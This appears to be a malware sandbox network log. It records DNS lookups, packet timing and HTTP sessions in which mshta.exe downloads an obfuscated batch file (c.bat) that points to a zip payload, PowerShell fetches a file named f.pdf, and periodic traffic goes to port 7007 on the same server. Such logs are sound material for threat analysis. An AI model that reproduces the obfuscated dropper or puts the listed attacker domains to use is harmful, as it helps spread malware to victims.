                                                                      Dec 16, 2024 01:33:13.977552891 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.977737904 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.977737904 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.977801085 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.977853060 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.984234095 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.984251976 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.984440088 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.984440088 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.984503984 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.984569073 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.991128922 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.991157055 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.991353035 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.991353989 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.991419077 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.991470098 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.997155905 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.997175932 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:13.997225046 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:13.997292995 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.979172945 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.045242071 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125511885 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125539064 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125585079 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125597000 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125622034 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125633001 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.132316113 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132335901 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132397890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.132407904 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132455111 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.138326883 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138345957 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138403893 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.138416052 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138457060 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.145236015 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145256042 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145306110 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.145318031 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145332098 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.146753073 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.151979923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152002096 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152051926 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.152062893 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152103901 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158813953 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158833981 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158868074 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158878088 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158894062 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158912897 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165201902 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165221930 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165282011 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165316105 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165345907 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165364027 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171236992 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171257973 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171406031 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171406031 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171473026 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171535015 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318005085 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318037033 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318253040 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318253994 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318317890 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318670034 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324553967 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.324573994 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.324775934 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324775934 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324842930 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.326788902 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.330606937 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.330626011 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.330725908 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.330790043 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.331132889 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337559938 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.337578058 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.337718964 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337719917 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337784052 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.338536978 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344285965 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344305992 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344358921 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344429970 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344470024 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344763041 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351058960 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351078033 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351238012 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351238012 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351340055 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351403952 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359509945 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359529018 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359747887 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359747887 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359812975 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359882116 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.363452911 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.363472939 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.363677979 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.517054081 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.517081976 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.517206907 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523078918 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523101091 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523143053 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523154020 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523175955 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523195982 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.529889107 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.529907942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.529983044 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.529994011 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.530071020 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.536633015 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536652088 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536721945 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.536731005 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536820889 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.540582895 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540627003 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540664911 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.540674925 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540690899 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540736914 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.674932957 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.691405058 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.805083990 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.227025986 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.347002029 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:42.350204945 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.508446932 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.628274918 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:52.437011957 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:52.486336946 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:55.067780972 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:55.187614918 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:07.627599955 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:07.747661114 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:20.189992905 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:20.309828997 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:22.453200102 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:22.502094030 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:32.744256020 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:32.864445925 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:45.299593925 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:45.419668913 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:51.018516064 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:51.138559103 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:52.453777075 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:52.508641958 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.096498013 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.216522932 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:55.216717005 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.336529016 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:59.487060070 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:59.607223988 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:37:02.637310982 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:37:02.757396936 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:37:05.400293112 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:37:05.520689964 CET700749994193.26.115.21192.168.2.4

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 01:32:59.766530037 CET | 58135 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 01:33:00.076527119 CET | 53 | 58135 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 01:33:15.439070940 CET | 65379 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 01:33:52.114818096 CET | 56171 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 01:33:52.349203110 CET | 53 | 56171 | 1.1.1.1 | 192.168.2.4
Dec 16, 2024 01:35:41.950181961 CET | 62479 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 01:35:42.223546982 CET | 53 | 62479 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 01:32:59.766530037 CET | 192.168.2.4 | 1.1.1.1 | 0x9b26 | Standard query (0) | myguyapp.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 01:33:15.439070940 CET | 192.168.2.4 | 1.1.1.1 | 0xd605 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 01:33:52.114818096 CET | 192.168.2.4 | 1.1.1.1 | 0x713d | Standard query (0) | dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | A (IP address) | IN (0x0001) | false
Dec 16, 2024 01:35:41.950181961 CET | 192.168.2.4 | 1.1.1.1 | 0xb911 | Standard query (0) | me-work.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 01:33:00.076527119 CET | 1.1.1.1 | 192.168.2.4 | 0x9b26 | No error (0) | myguyapp.com | (none) | 193.26.115.21 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 01:33:15.661242008 CET | 1.1.1.1 | 192.168.2.4 | 0xd605 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 01:33:52.349203110 CET | 1.1.1.1 | 192.168.2.4 | 0x713d | Name error (3) | dwLscOsEZmpbOxr.dwLscOsEZmpbOxr | none | none | A (IP address) | IN (0x0001) | false
Dec 16, 2024 01:35:42.223546982 CET | 1.1.1.1 | 192.168.2.4 | 0xb911 | No error (0) | me-work.com | (none) | 193.26.115.21 | A (IP address) | IN (0x0001) | false
                                                                      • myguyapp.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.26.115.21 | 443 | 1368 | C:\Windows\SysWOW64\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 00:33:01 UTC | 301 | OUT | GET /c.bat HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: en-CH
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                      Host: myguyapp.com
                                                                      Connection: Keep-Alive
2024-12-16 00:33:01 UTC | 288 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 00:33:01 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Thu, 12 Dec 2024 13:28:45 GMT
                                                                      ETag: "d68-62912b1984ca1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 3432
                                                                      Connection: close
                                                                      Content-Type: application/x-msdownload
2024-12-16 00:33:01 UTC | 3432 | IN | Data Raw: 40 25 47 68 61 45 25 65 25 51 4f 4e 25 63 25 6f 56 4e 6c 78 68 53 25 68 25 59 63 63 25 6f 25 54 5a 53 47 5a 64 54 7a 73 67 25 20 25 6d 43 52 70 25 6f 25 6d 59 73 66 5a 70 58 42 75 50 25 66 25 64 65 6a 54 4d 76 25 66 25 72 4f 59 53 65 66 45 4f 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 66 59 55 73 62 6e 6f 25 65 25 6d 48 46 71 7a 4c 6c 76 6b 57 25 74 25 68 55 42 76 4b 4f 51 74 57 25 20 25 42 74 61 44 72 73 4a 63 4b 25 75 25 62 77 6a 25 72 25 62 6a 62 25 6c 25 63 70 73 57 54 78 25 3d 25 43 4d 79 66 61 49 25 68 25 4e 4e 44 43 25 74 25 53 5a 47 25 74 25 73 67 25 70 25 77 79 74 64 58 73 48 25 73 25 58 4c 66 59 52 68 4f 25 3a 25 62 77 61 58 4a 53 5a 63 72 25 2f 25 76
                                                                      Data Ascii: @%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%set url=https://myguyapp.com/msword.zips%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%v


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 193.26.115.21 | 443 | 7104 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 00:33:04 UTC | 162 | OUT | GET /f.pdf HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: myguyapp.com
                                                                      Connection: Keep-Alive
2024-12-16 00:33:04 UTC | 283 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 00:33:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Mon, 28 Oct 2024 21:28:02 GMT
                                                                      ETag: "4374e-6259024c862cf"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 276302
                                                                      Connection: close
                                                                      Content-Type: application/pdf
2024-12-16 00:33:04 UTC | 7909 | IN | Data Raw: 25 50 44 46 2d 31 2e 34 0d 0a 25 c2 80 c2 81 c2 82 c2 83 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 20 0d 0a 20 20 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 31 20 0d 0a 20 20 20 2f 43 6f 6c 6f 72 53 70 61 63 65 20 33 20 30 20 52 20 0d 0a 20 20 20 2f 48 65 69 67 68 74 20 33 32 38 38 20 0d 0a 20 20 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 0d 0a 20 20 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 0d 0a 20 20 20 2f 57 69 64 74 68 20 32 35 36 30 20 0d 0a 20 20 20 2f 46 69 6c 74 65 72 20 5b 0d 0a 20 20 20 20 2f 43 43 49 54 54 46 61 78 44 65 63 6f 64 65 20 20 5d 0d 0a 20 20 20 0d 0a 20 20 20 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 0d 0a 20 20 20 20 3c 3c 20 0d 0a 20 20 20 20 20 20 2f 42 6c 61 63 6b 49 73 31 20 74 72 75 65 20 0d 0a 20 20
                                                                      Data Ascii: %PDF-1.4%1 0 obj<< /BitsPerComponent 1 /ColorSpace 3 0 R /Height 3288 /Subtype /Image /Type /XObject /Width 2560 /Filter [ /CCITTFaxDecode ] /DecodeParms [ << /BlackIs1 true
                                                                      2024-12-16 00:33:04 UTC16384INData Raw: fe f7 fc 8c 7f ff ff 55 fd ef fe df fa 8d 69 3f 7e 71 11 d6 be 97 fd 97 0b fb f1 12 2b 58 a7 56 ab ff 17 fd fe af 65 c1 ff ef ff fa 76 37 ff fd bf d6 d2 5f bf ff ff 7f ff f6 fa f7 bf f9 11 c2 fe f9 15 ac b1 4a ff ea 10 fe ff fc 8b cf fb db f8 fe 43 8e 50 ef 0e fb 7d e9 6f e8 47 4e be 43 13 af ff ff ff ef df d3 f7 7f ad d7 ff df 56 d2 fb 4b 7f bb bd ef bb 6d 7e 41 43 58 a6 b5 aa b0 d6 43 47 10 50 a0 30 bf 7c 8b ab bd f8 30 4a ee 2b 7f 5e b5 e3 f6 bf fb ff 6b da df e9 ee fd af 0d 7f af bf 86 bd 84 e1 a6 bd eb 7c 30 9a 06 55 94 39 14 70 88 98 41 11 da 68 44 44 18 21 11 11 1c 44 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c8 09 f0 b8 20 79 01 85 01 0a 9b 25 04 10 79 01 05 d1 7c 8e c8 ec d4 32 5c 50 44 18 04 78 4f 29 95 26 4b 45 3b d1 95 01 b0 a7 20
                                                                      Data Ascii: Ui?~q+XVev7_JCP}oGNCVKm~ACXCGP0|0J+^k|0U9pAhDD!D y%y|2\PDxO)&KE;
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ff fc 89 22 97 91 f2 0c c8 90 f3 58 c8 36 48 14 8c 1e 4c 05 04 18 41 90 e0 40 cc c3 00 83 33 0c 02 0c d1 a6 10 71 68 3f d3 4d 6d 3f 91 2d a2 3c 7f 5e 46 f2 0b 12 e4 55 99 39 11 83 22 c2 eb 9b 18 22 28 b1 2a 14 38 86 6a 0a 62 34 82 06 7c 30 08 32 1c 13 04 c1 0c 20 c1 10 20 e1 a1 0e d3 4d 3f 09 da 7f 85 44 47 68 8e 1c 84 bc 97 bf a6 e9 fc b7 30 21 06 29 4e 2d 82 98 59 81 41 11 06 cf 00 c1 03 21 a2 3a 04 18 20 60 98 41 94 06 08 c0 c4 43 04 19 30 08 84 34 2d 34 ed 03 43 40 d5 06 a8 3f 4f 4f d1 08 3e 42 43 44 5b 6d 35 c8 b8 e0 9d 27 84 ea 1f e9 d2 6d f0 40 ca 18 20 c2 74 10 87 84 0c 20 d0 86 10 68 44 35 40 c2 0d 3b 86 83 d3 5c 27 ae ab aa de 88 b8 da 91 df e0 83 70 9d 04 e5 06 43 3d 04 e9 3d 3d 37 5f d3 7f 5a 68 5a 17 c5 a0 ed 38 b0 9a 7f ae 9f c8 dd d2 22 db
                                                                      Data Ascii: "X6HLA@3qh?Mm?-<^FU9""(*8jb4|02 M?DGh0!)N-YA!: `AC04-4C@?OO>BCD[m5'm@ t hD5@;\'pC===7_ZhZ8"
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: 23 85 e2 a2 98 e2 9a ff 76 bf ab e9 a6 98 54 d0 88 86 08 89 b2 3e 22 19 46 e6 96 be 2b 90 9d d8 e3 63 f7 a7 6b fd a0 c2 6a 9a 0d 34 19 0b 61 08 83 04 0c 12 86 10 88 8e d7 bf 7e d5 3f 4c 26 98 4d 53 54 d3 08 30 9a 11 06 08 30 84 44 68 71 f6 b7 fa a6 43 be a4 c7 08 34 c2 0c 20 64 7b 17 04 22 23 fe 18 55 b4 d3 04 47 52 e0 20 61 08 e1 84 19 19 72 cd c2 a3 88 64 55 94 22 75 31 c4 71 11 6b 11 1f 6b f1 d7 ff ff f7 61 62 3f ff ff ff ff ff ff ff ff ef fa ff ff ff ff fe ff af fe ff ff ff ff ff ff ff ff ff ff ff ff ff 94 c2 9b cb 6d 69 fd ae 5a a6 a1 0e c5 33 b4 0b d9 5d 5d 96 69 f2 3b 32 10 64 71 9a 65 c1 0e 80 dc 20 66 a0 6e 83 5f 0b 96 61 34 50 66 98 21 22 d6 4a b2 c1 90 cd c2 75 93 a0 86 10 83 b4 1f af 5e 59 4c 22 e8 be 47 22 f9 9b 23 99 1d 17 23 38 a0 18 3a 0a
                                                                      Data Ascii: #vT>"F+ckj4a~?L&MST00DhqC4 d{"#UGR ardU"u1qkkab?miZ3]]i;2dqe fn_a4Pf!"Ju^YL"G"##8:
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: f2 46 68 83 fb ff b9 4e ff da ff 0d 87 77 ff 44 63 be bd b4 0c 20 79 a3 77 b5 db 5b 4e ff bf f7 39 3f ff d7 7f ff a7 f1 f1 5e eb b7 ff 9c 2d 07 fa 5f a4 de bf 6b 7f ab 5b b6 17 af ff fe fe fa 5c 8f 9b 46 12 57 6b ee 96 ba ff 56 b6 bd 75 fd ff b6 bb c4 44 97 5b b4 be 18 56 2b fd 76 1a 4d af ff f8 5b 5e c2 5f ef 15 ec 57 fd 6f 1d a5 a6 b7 fb 0c 24 c5 6c 76 ba 4c 3f da 6b f7 e9 a6 3b df fe 3f 6b f4 ba f6 9a 77 f6 dd aa ff fd a6 b6 15 35 4d 06 a4 dc 21 10 61 03 04 3f 5b 4d 06 16 ff 5b 4d 06 84 30 85 a1 11 c4 47 76 ab 0c 10 61 06 10 88 88 88 32 2a 72 39 01 d4 44 68 96 8a 0c e3 82 11 1f c4 47 d7 d2 df f5 d6 98 5e 3d 63 bf ff ff ff ff f9 67 7f ac 7f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd d5 cb 30 28 ce 88 ba 21 b3 a6 50 b2 ce 2f 90 f2
                                                                      Data Ascii: FhNwDc yw[N9?^-_k[\FWkVuD[V+vM[^_Wo$lvL?k;?kw5M!a?[M[M0Gva2*r9DhG^=cg0(!P/
